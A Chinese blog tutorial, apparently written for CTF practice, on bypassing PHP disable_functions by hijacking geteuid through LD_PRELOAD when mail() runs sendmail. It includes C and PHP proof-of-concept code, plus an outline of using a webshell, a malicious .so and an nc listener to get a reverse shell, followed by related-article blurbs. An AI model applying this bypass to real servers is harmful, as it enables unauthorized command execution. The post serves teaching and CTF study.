浅谈LD_PRELOAD绕过

已于 2025-04-16 21:39:34 修改
阅读量478 收藏 11
点赞数 5
CC 4.0 BY-SA版权
文章标签: 网络安全 web安全 php 命令执行漏洞
于 2025-04-16 21:34:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jijhvuu/article/details/147287055

前置知识点:

介绍文章

程序的装入与链接-CSDN博客

LD_PRELOAD是什么?

相当于一个命令 指定一个库并优先加载

攻击手段:

植入恶意程序

常用函数:

mail()

imagick()

以上两个函数都是通过调用系统库来实现功能

示例:

创建一个php文件 写入mail函数

<?php 
mail('','','');
?>

使用strace -o 1.txt -f php 1.php

将该函数的行为动作以文本格式记录

查看调用了哪些程序

使用grep 过滤可执行程序

cat 1.txt | grep 'exec'

发现调用了本地的php,sh,sendmail三个程序

php:因为是php语言所以调用了php

sh:用来调用sendmail库

下一步来查看sendmail调用了哪些库

readelf -Ws /usr/sbin/sendmail

这时候我们可以利用ld_preload特性对其进行劫持攻击 注入恶意程序

这里选用geteuid进行LD劫持

先编写一个C程序:
 

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
void payload() {
        system("ls");  

} //恶意作用域所需代码
int geteuid(){
        unsetenv("LD_PRELOAD"); 
        payload();

}      //创建一个恶意"geteuid" 并设置为unsetenv 调用恶意自定义函数

再使用gcc -shared -fPIC demo.c -o demo.so将C转换为so共享文件

写php代码

<?php
putenv("LD_PRELOAD=./demo.so");
mail('','','');
?>

优先加载恶意类 mail函数的程序过程将加载demo.so

并且执行ls

绕过条件:

允许设置环境变量值 ,比如putenv未禁止

题目思路:

1.先上传php文件 确保连接上webshell

2.上传恶意so文件 构造反弹shell

3.恶意php文件指向恶意so文件

4.在网页访问该文件 (反弹shell)

5.nc 监听本地 开始拿flag

wh0am1_root
关注
Linux Reverse(1)-LD_PRELOAD
lzx13290757580的博客
09-28 776
LD_PRELOAD是 Linux 系统中的一个环境变量,它允许用户在程序运行时动态地加载共享库。通过设置该环境变量,用户可以指定一个或多个共享库,这些库中的函数将在其他库或程序调用相同函数时优先使用。这在调试、注入、替换函数实现或修改程序行为时非常有用。
CTFHub Bypass disable_function 利用LD_PRELOAD绕过
z2560088的博客
10-04 1045
LD_PRELOAD是Linux系统的一个环境变量,它可以影响程序的运行时的链接(Runtime linker),它允许你定义在程序运行前优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量,我们可以在主程序和其动态链接库的中间加载别的动态链接库,甚至覆盖正常的函数库。一方面,我们可以以此功能来使用自己的或是更好的函数(无需别人的源码),而另一方面,我们也可以以向别人的程序注入程序,从而达到特定的目的。 putenv()用来改变或增加环境变量的内容. 参数.
UNIX下的LD_PRELOAD环境变量
cjsycyl的专栏
06-24 794
http://blog.chinaunix.net/uid-13344516-id-79188.html 前言          也许这个话题并不新鲜,因为LD_PRELOAD所产生的问题由来已久。不过,在这里,我还是想讨论一下这个环境变量。因为这个环境变量所带来的安全问题非常严重,值得所有的Unix下的程序员的注意。   在开始讲述为什么要当心LD_PRELOAD环 境变量之前
LD_PRELOAD作用
热门推荐
chen_jianjian的专栏
06-08 2万+
一、LD_PRELOAD是什么LD_PRELOAD是Linux系统的一个环境变量,它可以影响程序的运行时的链接(Runtime linker),它允许你定义在程序运行前优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量,我们可以在主程序和其动态链接库的中间加载别的动态链接库,甚至覆盖正常的函数库。一方面,我们可以以此功能来使用自己的或是更好的函数(...
Linux 共享库LD_PRELOAD环境变量
wayz11的专栏
03-19 6903
共享库转载器有许多可供配置的环境变量,比如我们前面介绍的LD_LIBRARY_PATH环境变量。本文只重点介绍LD_PRELOAD环境变量,因为这个环境变量体现了共享库一个非常重要的特性:共享库覆盖。 下面是man手册中对于LD_PRELOAD环境变量的介绍: A whitespace-separated list of additional, user-
深入分析 LD_PRELOAD
布袋和尚
07-13 1万+
是 系统的一个环境变量,它影响程序的运行时的链接(Runtime linker),它允许在程序运行前定义优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量,我们可以在主程序和其动态链接库的中间加载别的动态链接库,甚至覆盖正常的函数库。1、程序的链接程序的链接可以分为以下三种静态链接库,在 Linux 下文件名后缀为 ,如 。在编译链接时直接将目标代码加入可执行程序。动态链接库,在 Linux 下是 文件,在编译链接时只需要记录需要链接的号,运行程序时才会进行
LD_PRELOAD的用法
u012441962的博客
08-18 1554
LD_PRELOAD顾名思义,就是重新加载链接库。 一般用于链接库的重定向,例如linux测试lockdep的测试代码,就使用了此功能。 进入源码中的 cd linux-stable-rt-4.19/tools/lib/lockdep cat lockdep #!/bin/bash LD_PRELOAD="./liblockdep.so $LD_PRELOAD" "$@" 其实大概意思就是 LD_PRELOAD=./liblockdep.so.4.19.148 ./tests/AA 赋值给LD_P
Android API Hook之LD_PRELOAD
04-05
Android平台虽然有其特定的开发模式,但因为它底层是Linux,所以也能够使用Linux上的某些Hook技术,比如本文将要探讨的LD_PRELOADLD_PRELOAD是Linux下的一个环境变量,它能够在程序运行时动态地加载指定的动态...
openredir:通过 LD_PRELOAD 重定向文件打开操作
05-31
`LD_PRELOAD`是一个强大的Linux技巧,它允许我们修改或扩展动态链接器的行为。本篇文章将深入探讨`openredir`项目,它是如何利用`LD_PRELOAD`来重定向文件打开操作的。 首先,让我们理解`LD_PRELOAD`的概念。`LD_...
小心环境变量-浅谈LD_PRELOAD
少仲
04-18 6007
/* author:少仲 blog: http://blog.csdn.net/py_panyu weibo: http://weibo.com/u/3849478598 欢迎转载,转载请注明出处. */ 0x0 前言 在Windows平台,各种Hook技术已经被玩的天花乱坠.软件为了优先获得系统的控制权,都使用了各种Hook技术.常见的SSDT Hook/Inlin
使用LD_PRELOAD注入程序.pdf
04-26
linux 如何hook 任何一个目标文件中 使用的 第一层函数。在没有目标源码的情形下。对目标进行hook、 亲测,可以用
LD_PRELOAD含义
Erice_s的博客
01-06 337
LD_PRELOAD
【程序狂魔】掌握LD_PRELOAD轻松进行程序修改和优化的绝佳方法!
Lion_Long的博客
02-06 5099
LD_PRELOAD是Linux/Unix系统的一个环境变量,它可以影响程序的运行时的链接,它允许在程序运行前定义优先加载的动态链接库。通过这个环境变量,可以在主程序和其动态链接库的中间加载别的动态链接库,甚至覆盖系统的函数库。LD_PRELOAD 超脱于动态链接库的搜索路径先后顺序之外,它可以指定在程序运行前优先加载的动态链接库。我们可以自己实现一个函数,底层调用系统调用,理由LD_PRELOAD优先加载我们的函数。
浅谈LD_PRELOAD劫持
errorr0
04-22 2314
LD_PRELOAD劫持
LD_PRELOAD劫持
weixin_63231007的博客
12-24 3549
有趣的 LD_PRELOAD
LD_PRELOAD劫持。
snowlyzz的博客
08-18 708
劫持LD_PRELOAD
Linux LD_PRELOAD Hook
chi's blog
10-09 822
loader在进行动态链接的时候,会将有相同符号名的符号覆盖成LD_PRELOAD指定的so文件中的符号。换句话说,可以用我们自己的so库中的函数替换原来库里有的函数,从而达到hook的目的。但是LD_PRELOAD有个限制:只能hook动态链接的库,对静态链接的库无效,因为静态链接的代码都写到可执行文件里了嘛,没有坑让你填。使用PRE_LOAD劫持库函数的这种做法可以做很多事情,比如劫持随机函数random, random_r等,使得看起来是公平的摇号程序可以自如地由自己控制;
LD_PRELOAD替换进程底层函数
weixin_34413065的博客
05-16 565
2019独角兽企业重金招聘Python工程师标准>>> ...
利用 LD_PRELOAD劫持动态链接库,绕过 disable_function
最新发布
qq_68163788的博客
11-30 2136
LD_PRELOAD是一个环境变量,它允许用户在程序加载动态链接库(共享对象)时指定要预先加载的库。这个功能可以用来替换程序中的特定函数,或者添加额外的功能。 使用LD_PRELOAD可以在不修改源代码的情况下,对程序的行为进行修改。这对于调试、性能分析或者添加额外的安全检查非常有用。例如,可以使用LD_PRELOAD来替换标准库中的malloc和free函数,从而实现内存泄漏检测或者统计内存使用情况。 需要注意的是,LD_PRELOAD只对动态链接的程序有效
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值